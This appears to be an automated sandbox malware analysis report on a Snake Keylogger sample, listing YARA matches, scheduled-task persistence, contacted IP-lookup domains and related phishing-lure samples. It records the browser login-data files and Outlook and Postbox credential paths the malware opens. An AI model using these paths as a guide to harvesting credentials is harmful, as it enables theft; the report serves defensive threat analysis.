Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Queries volume information: C:\Users\user\AppData\Roaming\rXcourOVPD.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 15.2.rXcourOVPD.exe.3c228c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.file.exe.38117c0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rXcourOVPD.exe.3c028a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.file.exe.37f17a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.file.exe.37f17a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.file.exe.38117c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.3762642230.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3761812258.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3762642230.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3761812258.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rXcourOVPD.exe PID: 6576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rXcourOVPD.exe PID: 6976, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 15.2.rXcourOVPD.exe.3c228c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.file.exe.38117c0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rXcourOVPD.exe.3c028a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.file.exe.37f17a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.file.exe.37f17a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.file.exe.38117c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.3762642230.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3761812258.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3762642230.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3761812258.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rXcourOVPD.exe PID: 6576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rXcourOVPD.exe PID: 6976, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	13 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\rXcourOVPD.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\rXcourOVPD.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	172.67.177.134	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://reallyfreegeoip.org	file.exe, 0000000E.00000002.3761812258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B5C000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B9E000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	file.exe, 0000000E.00000002.3761812258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002ED5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C25000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B5C000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B9E000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	file.exe, 0000000E.00000002.3761812258.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B5C000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	file.exe, 00000004.00000002.1357596328.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 0000000F.00000002.1391876242.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002A91000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	file.exe, 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp, rXcourOVPD.exe, 0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	file.exe, 0000000E.00000002.3761812258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B9E000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	file.exe, 0000000E.00000002.3761812258.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B74000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	file.exe, 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp, rXcourOVPD.exe, 0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002B5C000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States		16989	UTMEMUS	false
172.67.177.134	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574874
Start date and time:	2024-12-13 17:56:56 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/15@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 396 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 23.218.208.109, 172.202.163.200, 4.245.163.56
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
11:57:51	API Interceptor	8146242x Sleep call for process: file.exe modified
11:57:53	API Interceptor	22x Sleep call for process: powershell.exe modified
11:57:57	API Interceptor	5727796x Sleep call for process: rXcourOVPD.exe modified
17:57:56	Task Scheduler	Run new task: rXcourOVPD path: C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	malware.ps1	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Shipping Documents.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	QUOTES REQUEST FOR PRICES.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Bank Swift and SOA PVRN0072700314080353_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ST07933.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Price Quotation-01.dqy.dll	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
172.67.177.134	77541373_BESOZT00_2024_99101234_1_4_1.exe	Get hash	malicious	MassLogger RAT	Browse
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	QUOTES REQUEST FOR PRICES.exe	Get hash	malicious	MassLogger RAT	Browse
	T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse
	file.exe	Get hash	malicious	Snake Keylogger	Browse
	fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	New_Order_List.exe	Get hash	malicious	Snake Keylogger	Browse
	Hesap_Hareketleri_09122024_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	77541373_BESOZT00_2024_99101234_1_4_1.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	AsyncClient.exe	Get hash	malicious	AsyncRAT, HVNC, PureLog Stealer	Browse	193.122.130.0
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Request for Quotations and specifications.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	hesaphareketi-01.pdfsxlx..exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
reallyfreegeoip.org	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	77541373_BESOZT00_2024_99101234_1_4_1.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Request for Quotations and specifications.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	hesaphareketi-01.pdfsxlx..exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	malware.ps1	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UTMEMUS	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	malware.ps1	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Shipping Documents.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	QUOTES REQUEST FOR PRICES.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Bank Swift and SOA PVRN0072700314080353_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
